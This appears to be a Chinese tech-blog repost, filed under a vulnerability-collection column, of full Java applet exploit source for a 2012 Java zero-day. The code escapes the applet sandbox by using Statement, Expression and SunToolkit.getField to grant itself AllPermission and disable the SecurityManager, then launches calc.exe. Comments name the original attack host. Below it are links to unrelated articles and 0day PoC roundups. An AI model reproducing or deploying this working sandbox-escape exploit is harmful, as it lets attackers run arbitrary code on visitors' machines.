CVE-2012-XXXX Java 0day

最新推荐文章于 2023-12-08 08:39:19 发布
最新推荐文章于 2023-12-08 08:39:19 发布
阅读量711 收藏
点赞数
分类专栏: 漏洞收集 文章标签: java permissions object class applet string 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85

//
// CVE-2012-XXXX Java 0day
//
// reported here: http://blog.fireeye.com/research/2012/08/zero-day-season-is-not-over-yet.html
// 
// secret host / ip : ok.aa24.net / 59.120.154.62
//
// regurgitated by jduck
//
// probably a metasploit module soon...
//
package cve2012xxxx;

import java.applet.Applet;
import java.awt.Graphics;
import java.beans.Expression;
import java.beans.Statement;
import java.lang.reflect.Field;
import java.net.URL;
import java.security.*;
import java.security.cert.Certificate;

public class Gondvv extends Applet
{

    public Gondvv()
    {
    }

    public void disableSecurity()
        throws Throwable
    {
        Statement localStatement = new Statement(System.class, "setSecurityManager", new Object[1]);
        Permissions localPermissions = new Permissions();
        localPermissions.add(new AllPermission());
        ProtectionDomain localProtectionDomain = new ProtectionDomain(new CodeSource(new URL("file:///"), new Certificate[0]), localPermissions);
        AccessControlContext localAccessControlContext = new AccessControlContext(new ProtectionDomain[] {
            localProtectionDomain
        });
        SetField(Statement.class, "acc", localStatement, localAccessControlContext);
        localStatement.execute();
    }

    private Class GetClass(String paramString)
        throws Throwable
    {
        Object arrayOfObject[] = new Object[1];
        arrayOfObject[0] = paramString;
        Expression localExpression = new Expression(Class.class, "forName", arrayOfObject);
        localExpression.execute();
        return (Class)localExpression.getValue();
    }

    private void SetField(Class paramClass, String paramString, Object paramObject1, Object paramObject2)
        throws Throwable
    {
        Object arrayOfObject[] = new Object[2];
        arrayOfObject[0] = paramClass;
        arrayOfObject[1] = paramString;
        Expression localExpression = new Expression(GetClass("sun.awt.SunToolkit"), "getField", arrayOfObject);
        localExpression.execute();
        ((Field)localExpression.getValue()).set(paramObject1, paramObject2);
    }

    public void init()
    {
        try
        {
            disableSecurity();
            Process localProcess = null;
            localProcess = Runtime.getRuntime().exec("calc.exe");
            if(localProcess != null);
               localProcess.waitFor();
        }
        catch(Throwable localThrowable)
        {
            localThrowable.printStackTrace();
        }
    }

    public void paint(Graphics paramGraphics)
    {
        paramGraphics.drawString("Loading", 50, 25);
    }
}
7禧
关注
专栏目录
2023年国家护网0day-poc/exp漏洞全汇总(目前已更新到91个..实时更新中...)
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
08-21 3380
2023年国家护网目前收集到的0day和1day漏洞的poc或者exp大汇总,截止目前已更新到91个漏洞,本文会实时更新,有新的漏洞都会加上
vulhub通关实战一(附docker vulhub 虚拟机环境)
悦分享
12-26 1657
docker vulhub 虚拟机环境:docker-compose up -d 启动服务:登录7001端口用户名weblogic,密码Oracle@123。
xxxx
weixin_30391339的博客
01-09 869
xxxx pom.xml; <project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0http://maven.apache...
java: \uxxxx unicode编码
m0_37564426的博客
08-09 1904
\uxxxx 其中xxxx表示一个16进制数字这种格式是unicode码的写法表示一个char字符 \u0022表示第34号的unicode字符 " 双引号 这个是unicode编码把字符转为unicode码 public static void judgeChineseCharactor(String str){ String regEx = "[\u4e00-\u9fa5]...
块级元素内容过长点点显示(XXXX....)
zhangfx5的博客
07-12 1542
在前端开发过程中,有时候由于页面布局问题,内容过长,不能全部显示,需要点点显示,如:XXXX.... 需要在文本所在的元素上加四个相应的属性, text-overflow:ellipsis width:80px overflow:hidden white-space:noerap 自己实际操作的结果展示: css设置: 页面展示:
Invalid bound statement (not found): xxx.xxxx.method解决办法
前功尽弃
05-12 1328
在SpringBoot 集成 Mybatis 时,在Eclipse里运行项目一切正常,但打包成 jar 文件在命令行支行时报错: Invalid bound statement (not found): xxx.xxxx.method 在检查mapper.xml文件里的配置均无错后,则需要在pom.xml文件里加入以下内容:<resources> <resource>
XXXX
热门推荐
cay22的专栏
05-31 12万+
XXXXXXXXXXXXXXXX
[红日安全]Web安全Day5 - 任意文件上传实战攻防
hongrisec的博客
02-26 1268
本文由红日安全成员: MisakiKata 编写,如有不当,还望斧正。 大家好,我们是红日安全-Web安全攻防小组。此项目是关于Web安全的系列文章分享,还包含一个HTB靶场供大家练习,我们给这个项目起了一个名字叫 Web安全实战 ,希望对想要学习Web安全的朋友们有所帮助。每一篇文章都是于基于漏洞简介-漏洞原理-漏洞危害-测试方法(手工测试,工具测试)-靶场测试(分为PHP靶场、JAVA靶场、P...
Web渗透测试-实战 方法 思路 总结
m0_55595611的博客
02-21 9488
尽可能的搜集目标的信息 端口信息 DNS信息 员工邮箱 信息搜集的分类 1、主动式信息搜集(可获取到的信息较多,但易被目标发现) 2、通过直接发起与被测目标网络之间的互动来获取相关信息,如通过Nmap扫描目标系统。 3、被动式信息搜集(搜集到的信息较少,但不易被发现) 4、通过第三方服务来获取目标网络相关信息。如通过搜索引擎方式来搜集信息。 搜索引擎 Google hacking 常用搜索语法: intitle:KEYWORD //搜索网页标题中含有关键词的网页 intext:KEYWORD //搜索站
运维知识点-MySQL从小白到入土
aming小老弟
11-04 647
获取表rider_users中字段id的备注信息:sql。
Java零散知识点XXXXXXXXX
qq_38270638的博客
08-13 5740
String s1=“123” //new String(“123”) String s2=“123” //引用类型,指向地址,但不能参与计算,与指针有所区别 Scanner scan=new Scanner(System.in); int input=scan.nextInt(); ...
java.util.hashmap cannot be cast toxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
chuziyan的博客
11-03 2222
看看在controll里是不是强转了
偶遇“未能从程序集XXXX...加载类型XXX”的问题
04-04 5975
       近日写了个dll,使用程序调试时,报了“未能从程序集XXXX...加载类型XXX"的错误,网上搜索了类似问题,出现这种情况的大部分引用的是框架的dll,而不是像我一样自己开发的dll。因此对自己的情况分析了一下,最后发现,调试的时候自己图方便,命名调试的.exe程序和dll文件时使用的相同的名字,导致命名空间,.xml文件等都冲突了,修改dll生成的文件名之后,问题顺利解决。于是将这...
【网络安全】零日漏洞(0day)是什么?如何防范零日攻击?
par@ish的博客
12-08 1万+
零日攻击是利用零日漏洞(0day)对系统或软件应用发动的网络攻击,近年来,零日攻击威胁在日益增长且难以防范,零日攻击已成为企业网络信息安全面临的最严峻的威胁之一。
写一个手机号344(xxx xxxx xxxx)格式方法
udbpgym的博客
09-07 3532
/** * 电话3 4 4格式(即:xxx xxxx xxxx) * 电话长度11位数字 * @param view 输入框 * @param text 文本 */ public static void onTextChanged344(EditText view, String text) { if (view== null || text == null || text.length() == 0) return; char space = ' '; int inde.
Unable to instantiate activity ComponentInfo{com.xxxx.xxxx/com.xxxx.xxxx.LoginActivity}:
Leonchen1024
11-17 2万+
今天写遇到了 java.lang.RuntimeException: Unable to instantiate activity ComponentInfo{com.xxxx.xxxx/com.xxxx.xxxx.LoginActivity}: java.lang.ClassNotFoundException: Didn't find class "com.xxxx.xxxx.Log
java0day
zyw_anquan的专栏
08-28 4099
jre 远程代码执行 产生: FireEeye在8月27日发布了一个新的java 0day的一些相关信息,该漏洞影响浏览器的JRE[1.7.x]插件,影响非常大,攻击者可利用该漏洞进行挂马攻击,进而控制网民用户的计算机。在捕获的样本中发现使用了Dadong’s JSXX 0.44 VIP加密方式。目前,该漏洞的利用代码已被公开,而官方尚未发布任何补丁;在补丁发布之前,建议用户卸载或禁用
两年来首次发现Java 0day漏洞
cpongo5
08-15 265
最近Oracle公司宣布了一个近两年以来首个Java 0day漏洞,它影响着Java Web Start的应用程序沙箱和Java applets的沙箱。考虑到此漏洞正在被利用,加上它便于开发,根据CVSS(通用漏洞评分系统)给此漏洞以最高风险级别的评分。Oracle公司已经发布了一个补丁,并敦促客户尽快升级。\\该漏洞被确认为CVE-2015-2590,它是趋势科技的智能防护网络在分析一些针对北约...
cve-2012-1675
最新发布
01-31
cve-2012-1675是指微软在2012年发现的一个针对Windows操作系统的安全漏洞。这个漏洞涉及到Windows Common Control库中的一个错误,可以被远程攻击者利用来执行恶意代码。具体来说,当用户访问一个包含恶意制作的缩略图的文件夹时,攻击者可以利用这个漏洞实现远程代码执行,从而获取系统的控制权。微软在发现这个漏洞后立即发布了安全更新,提醒用户及时安装以保护系统安全。 CVE-2012-1675暴露了系统在处理特定文件格式时的弱点,攻击者可以通过制作恶意文件来利用这个漏洞进行攻击。在计算机安全方面,这种远程代码执行漏洞通常被认为是十分严重和危险的,因为攻击者可以利用它来完全控制受影响的系统,甚至可能导致系统崩溃或数据泄露。因此,及时更新系统补丁是防范这类漏洞的有效方法。 总之,CVE-2012-1675是一次涉及Windows操作系统安全的重要漏洞事件,微软发布了相应的安全补丁来修复这个问题。用户在受影响的系统上安装了这个补丁后,就可以防止攻击者利用这个漏洞对系统进行恶意攻击。同时,这也提醒用户在日常使用计算机时要保持系统及时更新,以防范类似的安全威胁。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值